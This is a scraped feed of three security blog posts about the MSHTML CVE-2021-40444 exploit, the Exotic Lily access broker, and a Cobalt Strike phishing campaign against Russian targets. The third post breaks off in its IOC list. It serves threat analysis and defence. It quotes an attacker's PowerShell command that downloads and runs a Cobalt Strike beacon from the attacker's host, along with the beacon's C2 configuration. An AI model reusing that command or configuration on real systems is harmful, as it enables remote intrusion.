ActiveX\n\nBecause MSHTML is the beating heart of Internet Explorer, the vulnerability also exists in that browser. Although given its limited use, there is little risk of infection by that vector. Microsoft Office applications however, use the MSHTML component to display web content in Office documents.\n\nThe attack depends on MSHTML loading a specially crafted ActiveX control when the target opens a malicious Office document. The loaded ActiveX control can then run arbitrary code to infect the system with more malware.\n\nSo, the attacker will have to trick the user into opening a malicious document. But we all know how good some attackers are at this.\n\n### Mitigation\n\nAt the moment all supported Windows versions are vulnerable. Since there is no patch available yet, Microsoft proposes a few methods to block these attacks.\n\n * Disable the installation of all ActiveX controls in Internet Explorer via the registry. Previously-installed ActiveX controls will still run, but no new ones will be added, including malicious ones.\n * Open documents from the Internet in Protected View or Application Guard for Office, both of which prevent the current attack. This is a default setting but it may have been changed.\n\nDespite the lack of a ready patch, all versions of Malwarebytes currently block this threat, as shown below. Malwarebytes also detects the eventual payload, Cobalt Strike, and has done so for years, meaning that even if a threat actor had disabled anti-exploit, then Cobalt Strike itself would still be detected. \n\n![](https://blog.malwarebytes.com/wp-content/uploads/2021/09/MSHTML-1-600x427.png)\n\n![](https://blog.malwarebytes.com/wp-content/uploads/2021/09/MSHTML-teams-600x371.png)A screenshot from Malwarebytes Teams showing active detection of this threat\n\n![](https://blog.malwarebytes.com/wp-content/uploads/2021/09/MSHTML-2-600x349.png)A screenshot from Malwarebytes Nebula showing active detection of this threat\n\n![](https://blog.malwarebytes.com/wp-content/uploads/2021/09/Teams-image-2-600x393.png)A screenshot of Malwarebytes Teams blocking the final payload\n\n![](https://blog.malwarebytes.com/wp-content/uploads/2021/09/MBAE-image-1-600x419.png)A screenshot of Malwarebytes Anti-Exploit blocking the exploit payload process\n\n### Registry changes\n\nModifying the registry may create unforeseen results, so create a backup before you change it! It may also come in handy when you want to undo the changes at a later point.\n\nTo create a backup, open Regedit and drill down to the key you want to back up (if it exists):\n\n`HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones`\n\nRight click the key in the left side of the registry pane and select "Export". Follow the prompts and save the created reg file with a name and in a location where you can easily find it.\n\n![registry export](https://blog.malwarebytes.com/wp-content/uploads/2021/09/exportregistrykey.png)\n\nTo make the recommended changes, open a text file and paste in the following script. Make sure that all of the code box content is pasted into the text file!\n \n \n Windows Registry Editor Version 5.00\n \n [HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0]\n \"1001\"=dword:00000003\n \"1004\"=dword:00000003\n \n [HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1]\n \"1001\"=dword:00000003\n \"1004\"=dword:00000003\n \n [HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2]\n \"1001\"=dword:00000003\n \"1004\"=dword:00000003\n \n [HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3]\n \"1001\"=dword:00000003\n \"1004\"=dword:00000003\n \n\nSave the file with a .reg file extension. Right-click the file and select Merge. You'll be prompted about adding the information to the registry, agree, and then reboot your machine.\n\n## Update september 9, 2021\n\nIt has taken researchers only a few days to circumvent the mitigations proposed by Microsoft. Once they were able to find a sample of a malicious Word document, they have started analyzing how it works and along the way poked holes in the defense strategies proposed by Microsoft.\n\nOne of the wobbly pillars is the Mark-of-the-Web (MoTW) flag that is given to downloaded files. This only blocks the exploit unless a user clicks on the 'Enable Editing' buttons. Sadly, experience has learned us that it is not a good idea to trust that they won't do that. Another problem with this flag is that it doesn't survive when it is handled by other applications, like for example, unzipping. Another problem are certain filetypes that use the same MSHTML to view webcontent, but are not protected by Office's Protected View security feature. Researcher [Will Dormann](<https://twitter.com/wdormann/status/1435951560006189060>) was able to replicate the attasck using an RTF file.\n\nThe registry fix we posted to prevent ActiveX controls from running in Internet Explorer, were supposed to effectively block the current attacks. But, security researcher Kevin Beaumont has already [discovered a way](<https://twitter.com/GossiTheDog/status/1435570418623070210>) to bypass Microsoft's current mitigations to exploit this vulnerability.\n\n### The attack chain\n\nThe researchers have also managed to reconstruct the attack chain with the use of a limited set of samples of malicious docx files. \n\n * Once a user clicks on the 'Enable Editing' button, the exploit will load a _side.html_ file by using the mhtml protocol to open a URL. The _side.html _file is hosted at a remote site and will be loaded as a Word template.\n * The Internet Explorer browser will be started to load the HTML, and its obfuscated JavaScript code will exploit the CVE-2021-40444 vulnerability to create a malicious ActiveX control.\n * This ActiveX control will download a _ministry.cab_ file from a remote site.\n * And extract a _championship.inf_ file, which is actually a DLL, and execute it as a CPL file by using rundll32.exe.\n * The ultimate payload is a Cobalt Strike beacon, which would allow the threat actor to gain remote access to the device.\n\nGiven the few days that are left until next patch Tuesday, it is doubtful whether Microsoft will be able to come up with an effective patch.\n\nConsider me one happy camper that Malwarebytes does not rely on the MoTW flag.\n\n![Office Exploit blocked](https://blog.malwarebytes.com/wp-content/uploads/2021/09/ExploitOfficeWMIblock.png)_This is what happened when I tried to "edit" the Word doc the researchers analyzed_\n\n## Update september 13, 2021\n\nAs [reported by BleepingComputer](<https://www.bleepingcomputer.com/news/microsoft/windows-mshtml-zero-day-exploits-shared-on-hacking-forums/>) threat actors are sharing PoCs, tutorials and exploits on hacking forums, so that every script kiddy and wannabe hacker can follow step-by-step instructions to build their own attacks. Since the method we mentioned that uses an RTF file even works in Windows explorer file previews. This means this vulnerability can be exploited by viewing a malicious document using the Windows Explorer preview feature.\n\nSince this was discovered, Microsoft has added the following mitigation to disable previewing of RTF and Word documents:\n\n 1. In the Registry Editor (regedit.exe), navigate to the appropriate registry key: **For Word documents, navigate to these keys:**\n * HKEY_CLASSES_ROOT.docx\\ShellEx{8895b1c6-b41f-4c1c-a562-0d564250836f}\n * HKEY_CLASSES_ROOT.doc\\ShellEx{8895b1c6-b41f-4c1c-a562-0d564250836f}\n * HKEY_CLASSES_ROOT.docm\\ShellEx{8895b1c6-b41f-4c1c-a562-0d564250836f} **For rich text files (RTF), navigate to this key:**\n * HKEY_CLASSES_ROOT.rtf\\ShellEx{8895b1c6-b41f-4c1c-a562-0d564250836f}\n 2. Export a copy of the Registry key as a backup.\n 3. Now double-click **Name** and in the **Edit String** dialog box, delete the Value Data.\n 4. Click **OK**,\n\nWord document and RTF file previews are now disabled in Windows Explorer.\n\nTo enable Windows Explorer preview for these documents, double-click on the backup .reg file you created in step 2 above.\n\nStay safe,everyone!\n\nThe post [[updated] Windows MSHTML zero-day actively exploited, mitigations required](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/windows-mshtml-zero-day-actively-exploited-mitigations-required/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-09-08T11:04:07", "type": "malwarebytes", "title": "[updated] Windows MSHTML zero-day actively exploited, mitigations required", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-08T11:04:07", "id": "MALWAREBYTES:DB54B348AF1AC41987150B5CE7B1BC66", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/windows-mshtml-zero-day-actively-exploited-mitigations-required/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-03-18T23:27:45", "description": "The Google Threat Analysis Group (TAG) has shared their observations about a group of cybercriminals called Exotic Lily. This group has specialized itself as an initial access broker, which means they find a vulnerability in an organization's defenses, exploit that vulnerability, and sell the access to the victim's network to an interested party, several times over with different victims.\n\nAmong these interested parties TAG found the [Conti](<https://blog.malwarebytes.com/threat-spotlight/2021/05/threat-spotlight-conti-the-ransomware-used-in-the-hse-healthcare-attack/>) and Diavol ransomware groups. Because Exotic Lily's methods involved a lot of detail, they are believed to require a level of human interaction that is rather unusual for cybercrime groups focused on large scale operations.\n\n## Initial access broker\n\nLike in any maturing industry, you can expect to see specialization and diversification. Initial access brokers are an example of specialized cybercriminals. They will use a vulnerability to gain initial access, and, probably based on the nature of the target, sell this access to other cybercriminals that can use this access to deploy their specific malware.\n\nThese initial access brokers are different from the usual ransomware affiliates that will deploy the ransomware they are affiliated with themselves and use the infrastructure provided by the ransomware as a service (RaaS) group to get a chunk of the ransom if the victim decides to pay. The RaaS will provide the encryption software, the contact and leak sites, and negotiate the ransom with the victim. An initial access broker will inform another cybercriminal by letting them know they have found a way in at company xyz, and inquire how much they are willing to pay for that access.\n\n## Exotic Lily\n\nFrom the [TAG blog](<https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/>) we can learn that Exotic Lily was very much specialized. Their initial attack vector was email. Initially, they were targeting specific industries such as IT, cybersecurity, and healthcare, but that focus has become less stringent.\n\nTheir email campaigns gained credibility by spoofing companies and employees. Their email campaigns were targeted to a degree that they are believed to be sent by real human operators using little to no automation. To evade detection mechanisms they used common services like WeTransfer, TransferNow, and OneDrive to deliver the payload.\n\nLast year, researchers found that Exotic Lily used the vulnerability listed as [CVE-2021-40444](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40444>), a Microsoft MSHTML Remote Code Execution (RCE) vulnerability. Microsoft also posted a [blog](<https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/>) about attacks that exploited this vulnerability. Later, the group shifted to using customized versions of [BazarLoader](<https://blog.malwarebytes.com/detections/trojan-bazar/>) delivered inside ISO files.\n\nBased on the fact that the Exotic Lily\u2019s operations require a lot of human interaction, the researchers did an analysis of the \u201cworking hours\u201d and came to the conclusion that it looks like a regular 9 to 5 operation located in a Central or Eastern Europe time zone.\n\n## Social engineering\n\nAs with most email campaigns the amount of social engineering largely defines how successful such a campaign can be. Between the millions of emails sent in a "spray-and-pray" attack, to the thousands that Exotic Lily sends out per day, there is a huge difference in success rate.\n\nExotic Lily used identity [spoofing](<https://blog.malwarebytes.com/cybercrime/2016/06/email-spoofing/>) where they replaced the TLD for a legitimate domain and replaced it with \u201c.us\u201d, \u201c.co\u201d or \u201c.biz\u201d. At first, the group would create entirely fake personas posing as employees of a real company. These personas would come including social media profiles, personal websites, and AI generated profile pictures. That must have been a lot of work, so at some point the group started to impersonate real company employees by copying their personal data from social media and business databases such as RocketReach and CrunchBase.\n\nUsing such spoofed accounts, the attackers would send [spear phishing](<https://blog.malwarebytes.com/social-engineering/2020/01/spear-phishing-101-what-you-need-to-know/>) emails with a business proposal and even engage in further communication with the target by attempting to schedule a meeting to discuss the project's design or requirements.\n\n## IOC\u2019s\n\nSHA-256 hashes of the **BazarLoader** ISO samples:\n\n * 5ceb28316f29c3912332065eeaaebf59f10d79cd9388ef2a7802b9bb80d797be\n * 9fdec91231fe3a709c8d4ec39e25ce8c55282167c561b14917b52701494ac269\n * c896ee848586dd0c61c2a821a03192a5efef1b4b4e03b48aba18eedab1b864f7\n\nSHA-256 hashes of the **BUMBLEBEE** ISO samples:\n\n * 9eacade8174f008c48ea57d43068dbce3d91093603db0511467c18252f60de32\n * 6214e19836c0c3c4bc94e23d6391c45ad87fdd890f6cbd3ab078650455c31dc8\n * 201c4d0070552d9dc06b76ee55479fc0a9dfacb6dbec6bbec5265e04644eebc9\n * 1fd5326034792c0f0fb00be77629a10ac9162b2f473f96072397a5d639da45dd\n * 01cc151149b5bf974449b00de08ce7dbf5eca77f55edd00982a959e48d017225\n\n**IP** address of the [C&C server](<https://blog.malwarebytes.com/glossary/cc/>):\n\n * 23.81.246.187\n\nStay safe, everyone!\n\nThe post [Meet Exotic Lily, access broker for ransomware and other malware peddlers](<https://blog.malwarebytes.com/threat-spotlight/2022/03/meet-exotic-lily-access-broker-for-ransomware-and-other-malware-peddlers/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-03-18T22:58:48", "type": "malwarebytes", "title": "Meet Exotic Lily, access broker for ransomware and other malware peddlers", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-03-18T22:58:48", "id": "MALWAREBYTES:F1563A57212EB7AEC347075E94FF1605", "href": "https://blog.malwarebytes.com/threat-spotlight/2022/03/meet-exotic-lily-access-broker-for-ransomware-and-other-malware-peddlers/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-31T15:44:27", "description": "_This blog post was authored by Hossein Jazi._\n\n-- _Updated to clarify the two different campaigns (Cobalt Strike and Rat)_\n\nSeveral threat actors have taken advantage of the war in Ukraine to launch a number of cyber attacks. The Malwarebytes Threat Intelligence team is actively monitoring these threats and has observed activities associated with the geopolitical conflict.\n\nMore specifically, we've witnessed several APT actors such as [Mustang Panda](<https://twitter.com/h2jazi/status/1501198521139175427>), [UNC1151](<https://twitter.com/h2jazi/status/1500607147989684224>) and [SCARAB](<https://twitter.com/h2jazi/status/1505887653111209994>) that have used war-related themes to target mostly Ukraine. We've also observed several different [wipers](<https://blog.malwarebytes.com/threat-intelligence/2022/03/hermeticwiper-a-detailed-analysis-of-the-destructive-malware-that-targeted-ukraine/>) and cybercrime groups such as [FormBook](<https://blog.malwarebytes.com/threat-intelligence/2022/03/formbook-spam-campaign-targets-citizens-of-ukraine%EF%B8%8F/>) using the same tactics. Beside those known groups we saw an [actor](<https://twitter.com/h2jazi/status/1501941517409083397>) that used multiple methods to deploy a variants of Quasar Rat. These methods include using documents that exploit CVE-2017-0199 and CVE-2021-40444, macro-embedded documents, and executables. \n\nOn March 23, we identified a new campaign that instead of targeting Ukraine is focusing on Russian citizens and government entities. Based on the email content it is likely that the threat actor is targeting people that are against the Russian government.\n\nThe spear phishing emails are warning people that use websites, social networks, instant messengers and VPN services that have been banned by the Russian Government and that criminal charges will be laid. Victims are lured to open a malicious attachment or link to find out more, only to be infected with Cobalt Strike.\n\n## Spear phishing as the main initial infection vector\n\nThese emails pretend to be from the "Ministry of Digital Development, Telecommunications and Mass Communications of the Russian Federation" and "Federal Service for Supervision of Communications, Information Technology and Mass Communications" of Russia.\n\nWe have observed two documents associated with this campaign that both exploit CVE-2021-40444. Even though CVE-2021-40444 has been used in a few attacks in the past, to the best of our knowledge this was the first time we observed an attacker use RTF files instead of Word documents to exploit this vulnerability. Also the actor leveraged a new variant of this exploit called CABLESS in this attack. [Sophos](<https://news.sophos.com/en-us/2021/12/21/attackers-test-cab-less-40444-exploit-in-a-dry-run/>) has reported an attack that used a Cabless variant of this exploit but in that case the actor has not used the RTF file and also used RAR file to prepend the WSF data to it.\n\n * **Email with RTF file: **\n * _\u0424\u0435\u0434\u0435\u0440\u0430\u043b\u044c\u043d\u0430\u044f \u0441\u043b\u0443\u0436\u0431\u0430 \u043f\u043e \u043d\u0430\u0434\u0437\u043e\u0440\u0443 \u0432 \u0441\u0444\u0435\u0440\u0435 \u0441\u0432\u044f\u0437\u0438, \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u0442\u0435\u0445\u043d\u043e\u043b\u043e\u0433\u0438\u0439 \u0438 \u043c\u0430\u0441\u0441\u043e\u0432\u044b\u0445 \u043a\u043e\u043c\u043c\u0443\u043d\u0438\u043a\u0430\u0446\u0438\u0439_ (Federal Service for Supervision of Communications, Information Technology and Mass Communications)\n * _\u041f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u0435! \u041c\u0438\u043d\u0438\u0441\u0442\u0435\u0440\u0441\u0442\u0432\u043e \u0446\u0438\u0444\u0440\u043e\u0432\u043e\u0433\u043e \u0440\u0430\u0437\u0432\u0438\u0442\u0438\u044f, \u0441\u0432\u044f\u0437\u0438 \u0438 \u043c\u0430\u0441\u0441\u043e\u0432\u044b\u0445 \u043a\u043e\u043c\u043c\u0443\u043d\u0438\u043a\u0430\u0446\u0438\u0439 \u0420\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u043e\u0439 \u0424\u0435\u0434\u0435\u0440\u0430\u0446\u0438\u0438_ (A warning! Ministry of Digital Development, Telecommunications and Mass Media of the Russian Federation)\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2022/03/phish1-2.png)](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/phish1-2.png> \"\" )Figure 1: Phishing template\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2022/03/phish2.png)](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/phish2.png> \"\" )Figure 2: Phishing template \n\n * **Email with archive file:**\n * _\u0438\u043d\u0444\u043e\u0440\u043c\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u043d\u0430\u0441\u0435\u043b\u0435\u043d\u0438\u044f \u043e\u0431 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u044f\u0445 \u0432 \u0441\u0444\u0435\u0440\u0435 \u0446\u0438\u0444\u0440\u043e\u0432\u044b\u0445 \u0442\u0435\u0445\u043d\u043e\u043b\u043e\u0433\u0438\u0439, \u0441\u0435\u0440\u0432\u0438\u0441\u043e\u0432, \u0441\u0430\u043d\u043a\u0446\u0438\u0439 \u0438 \u0443\u0433\u043e\u043b\u043e\u0432\u043d\u043e\u0439 \u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0441\u0442\u0438 \u0437\u0430 \u0438\u0445 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435_. (informing the public about critical changes in the field of digital technologies, services, sanctions and criminal liability for their use.)\n * _\u0412\u043d\u0438\u043c\u0430\u043d\u0438\u0435! \u0418\u043d\u0444\u043e\u0440\u043c\u0438\u0440\u0443\u0435\u0442 \u041c\u0438\u043d\u0438\u0441\u0442\u0435\u0440\u0441\u0442\u0432\u043e \u0446\u0438\u0444\u0440\u043e\u0432\u043e\u0433\u043e \u0440\u0430\u0437\u0432\u0438\u0442\u0438\u044f, \u0441\u0432\u044f\u0437\u0438 \u0438 \u043c\u0430\u0441\u0441\u043e\u0432\u044b\u0445 \u043a\u043e\u043c\u043c\u0443\u043d\u0438\u043a\u0430\u0446\u0438\u0439 \u0420\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u043e\u0439 \u0424\u0435\u0434\u0435\u0440\u0430\u0446\u0438\u0438_ (Attention! Informs the Ministry of Digital Development, Communications and Mass Media of the Russian Federation)\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2022/03/phish4.png)](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/phish4.png> \"\" )Figure 3: Phishing template \n\n * **Email with link:**\n * _\u0412\u043d\u0438\u043c\u0430\u043d\u0438\u0435! \u0418\u043d\u0444\u043e\u0440\u043c\u0438\u0440\u0443\u0435\u0442 \u041c\u0438\u043d\u0438\u0441\u0442\u0435\u0440\u0441\u0442\u0432\u043e \u0446\u0438\u0444\u0440\u043e\u0432\u043e\u0433\u043e \u0440\u0430\u0437\u0432\u0438\u0442\u0438\u044f, \u0441\u0432\u044f\u0437\u0438 \u0438 \u043c\u0430\u0441\u0441\u043e\u0432\u044b\u0445 \u043a\u043e\u043c\u043c\u0443\u043d\u0438\u043a\u0430\u0446\u0438\u0439 \u0420\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u043e\u0439 \u0424\u0435\u0434\u0435\u0440\u0430\u0446\u0438\u0438_ (Attention! Informs the Ministry of Digital Development, Communications and Mass Media of the Russian Federation)\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2022/03/phish3.png)](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/phish3.png> \"\" )Figure 4: phishing template \n\n## Victimology\n\nThe actor has sent its spear phishing emails to people that had email with these domains: \n\n_mail.ru, mvd.ru, yandex.ru, cap.ru, minobr-altai.ru, yandex.ru, stavminobr.ru, mon.alania.gov.ru, astrobl.ru, 38edu.ru, mosreg.ru, mo.udmr.ru, minobrnauki.gov.ru, 66.fskn.gov.ru, bk.ru, ukr.net_\n\nBased on these domains, here is the list of potential victims:\n\n * Portal of authorities of the Chuvash Republic Official Internet portal\n * Russian Ministry of Internal Affairs\n * ministry of education and science of the republic of Altai \n * Ministry of Education of the Stavropol Territory\n * Minister of Education and Science of the Republic of North Ossetia-Alania\n * Government of Astrakhan region \n * Ministry of Education of the Irkutsk region \n * Portal of the state and municipal service Moscow region \n * Ministry of science and higher education of the Russian Federation\n\n## Analysis:\n\nThe lures used by the threat actor are in Russian language and pretend to be from Russia's "Ministry of Information Technologies and Communications of the Russian Federation" and "MINISTRY OF DIGITAL DEVELOPMENT, COMMUNICATIONS AND MASS COMMUNICATIONS". One of them is a letter about limitation of access to Telegram application in Russia. \n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2022/03/russia.png)](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/russia.png> \"\" )Figure 5: Lure letter\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2022/03/cveblock.png)](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/cveblock.png> \"\" )Figure 6: Lure template\n\n \nThese RTF files contains an embedded url that downloads an html file which exploits the vulnerability in the MSHTML engine. \n`http://wallpaper.skin/office/updates/GtkjdsjkyLkjhsTYhdsd/exploit.html`\n\nThe html file contains a script that executes the script in WSF data embedded in the RTF file. \n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2022/03/Screen-Shot-2022-03-25-at-2.37.47-PM.png)](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/Screen-Shot-2022-03-25-at-2.37.47-PM.png> \"\" )Figure 7: html file\n\n \nThe actor has added WSF data (Windows Script Host) at the start of the RTF file. As you can see from figure 8, WSF data contains a JScript code that can be accessed from a remote location. In this case this data has been accessed using the downloaded html exploit file. \n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2022/03/Screen-Shot-2022-03-25-at-1.43.00-PM.png)](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/Screen-Shot-2022-03-25-at-1.43.00-PM.png> \"\" )Figure 8: WSF data\n\nExecuting this scripts leads to spawning PowerShell to download a CobaltStrike beacon from the remote server and execute it on the victim's machine. (The deployed CobaltStrike file name is Putty) \n \n \n \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -windowstyle hidden $ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest 'http://wallpaper.skin/office/updates/GtkjdsjkyLkjhsTYhdsd/putty.exe' -OutFile $env:TEMP\\putty.exe; . $env:TEMP\\putty.exe; Start-Sleep 15\n\nThe following shows the CobaltStrike config:\n \n \n {\n \"BeaconType\": [\n \"HTTPS\"\n ],\n \"Port\": 443,\n \"SleepTime\": 38500,\n \"MaxGetSize\": 1398151,\n \"Jitter\": 27,\n \"C2Server\": \"wikipedia-book.vote,/async/newtab_ogb\",\n \"HttpPostUri\": \"/gen_204\",\n \"Malleable_C2_Instructions\": [\n \"Remove 17 bytes from the end\",\n \"Remove 32 bytes from the beginning\",\n \"Base64 URL-safe decode\"\n ],\n \"SpawnTo\": \"/4jEZLD/DHKDj1CbBvlJIg==\",\n \"HttpGet_Verb\": \"GET\",\n \"HttpPost_Verb\": \"POST\",\n \"HttpPostChunk\": 96,\n \"Spawnto_x86\": \"%windir%\\\\syswow64\\\\gpupdate.exe\",\n \"Spawnto_x64\": \"%windir%\\\\sysnative\\\\gpupdate.exe\",\n \"CryptoScheme\": 0,\n \"Proxy_Behavior\": \"Use IE settings\",\n \"Watermark\": 1432529977,\n \"bStageCleanup\": \"True\",\n \"bCFGCaution\": \"True\",\n \"KillDate\": 0,\n \"bProcInject_StartRWX\": \"True\",\n \"bProcInject_UseRWX\": \"False\",\n \"bProcInject_MinAllocSize\": 16700,\n \"ProcInject_PrependAppend_x86\": [\n \"kJCQ\",\n \"Empty\"\n ],\n \"ProcInject_PrependAppend_x64\": [\n \"kJCQ\",\n \"Empty\"\n ],\n \"ProcInject_Execute\": [\n \"ntdll.dll:RtlUserThreadStart\",\n \"SetThreadContext\",\n \"NtQueueApcThread-s\",\n \"kernel32.dll:LoadLibraryA\",\n \"RtlCreateUserThread\"\n ],\n \"ProcInject_AllocationMethod\": \"NtMapViewOfSection\",\n \"bUsesCookies\": \"True\",\n \"HostHeader\": \"\"\n }\n\n## Similar lure used by another actor\n\nWe also have identified activity by another actor that uses a similar lure as the one used in the previously mentioned campaign. This activity is potentially related to [Carbon Spider](<https://www.virustotal.com/gui/domain/swordoke.com/community>) and uses "_\u0424\u0435\u0434\u0435\u0440\u0430\u043b\u044c\u043d\u0430\u044f \u0441\u043b\u0443\u0436\u0431\u0430 \u043f\u043e \u043d\u0430\u0434\u0437\u043e\u0440\u0443 \u0432 \u0441\u0444\u0435\u0440\u0435 \u0441\u0432\u044f\u0437\u0438, \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u0442\u0435\u0445\u043d\u043e\u043b\u043e\u0433\u0438\u0439 \u0438 \u043c\u0430\u0441\u0441\u043e\u0432\u044b\u0445 \u043a\u043e\u043c\u043c\u0443\u043d\u0438\u043a\u0430\u0446\u0438\u0439_" (Federal Service for Supervision of Communications, Information Technology and Mass Communications) of Russia as a template. In this case, the threat actor has deployed a PowerShell-based Rat. \n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2022/03/block-doc1.png)](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/block-doc1.png> \"\" )Figure 9: template\n\nThe dropped PowerShell script is obfuscated using a combination of Base64 and custom obfuscation. \n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2022/03/ps-dropped.png)](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/ps-dropped.png> \"\" )Figure 10: Dropped PS script\n\nAfter deobfuscating the script, you can see the Rat deployed by this actor. This PowerShell based Rat has the capability to get the next stage payload and execute it. The next stage payload can be one of the following file types:\n\n * JavaScript\n * PowerShell\n * Executable\n * DLL\n\nAll of Its communications with its server are in Base64 format. This Rat starts its activity by setting up some configurations which include the C2 url, intervals, debug mode and a parameter named group that initialized with "Madagascar" which probably is another alias of the actor. \n\nAfter setting up the configuration, it calls the "Initialize-Engine" function. This function collects the victim's info including OS info, Username, Hostname, Bios info and also a host-domain value that shows if the machine in a domain member or not. It then appends all the collected into into a string and separate them by "|" character and at the end it add the group name and API config value. The created string is being send to the server using _Send-WebInit_ function. This function adds "INIT%%%" string to the created string and base64 encodes it and sends it to the server. \n\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2022/03/ps-deobfuscated.png)](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/ps-deobfuscated.png> \"\" )Figure 11: PowerShell Rat\n\nAfter performing the initialization, it goes into a loop that keeps calling the "Invoke-Engine" function. This function checks the incoming tasks from the server, decodes them and calls the proper function to execute the incoming task. If there is no task to execute, it sends "GETTASK%%" in Base64 format to its server to show it is ready to get tasks and execute them. The "IC" command is used to delete itself.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2022/03/invoke-task.png)](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/invoke-task.png> \"\" )Figure 12: Invoke task\n\nThe result of the task execution will be send to the server using "PUTTASK%%" command. \n\n## Infrastructure\n\nThe following shows the infrastructure used by this actor highlighting that the different lures are all connected. \n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2022/03/undefined.png)](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/undefined.png> \"\" )Figure 12: Infrastructure \n\nThe Malwarebytes Threat Intelligence continues to monitor cyber attacks related to the Ukraine war. We are protecting our customers and sharing additional indicators of compromise.\n\n## IOCs\n\n**RTF files host domain: ** \ndigital-ministry[.]ru \n**RTF files:** \nPKH telegram.rtf \nb19af42ff8cf0f68e520a88f40ffd76f53a27dffa33b313fe22192813d383e1e \nPKH.rtf \n38f2b578a9da463f555614e9ca9036337dad0af4e03d89faf09b4227f035db20 \n**MSHTML exploit: ** \nwallpaper[.]skin/office/updates/GtkjdsjkyLkjhsTYhdsd/exploit.html \n4e1304f4589a706c60f1f367d804afecd3e08b08b7d5e6bd8c93384f0917385c \n**CobaltStrike Download URL:** \nwallpaper[.]skin/office/updates/GtkjdsjkyLkjhsTYhdsd/putty.exe \n**CobaltStrike:** \nPutty.exe \nd4eaf26969848d8027df7c8c638754f55437c0937fbf97d0d24cd20dd92ca66d \n**CobaltStrike C2:** \nwikipedia-book[.]vote/async/newtab_ogb \n**Macro based maldoc: \n**c7dd490adb297b7f529950778b5a426e8068ea2df58be5d8fd49fe55b5331e28 \n**PowerShell based RAT:** \n9d4640bde3daf44cc4258eb5f294ca478306aa5268c7d314fc5019cf783041f0** \nPowerShell Rat C2:** 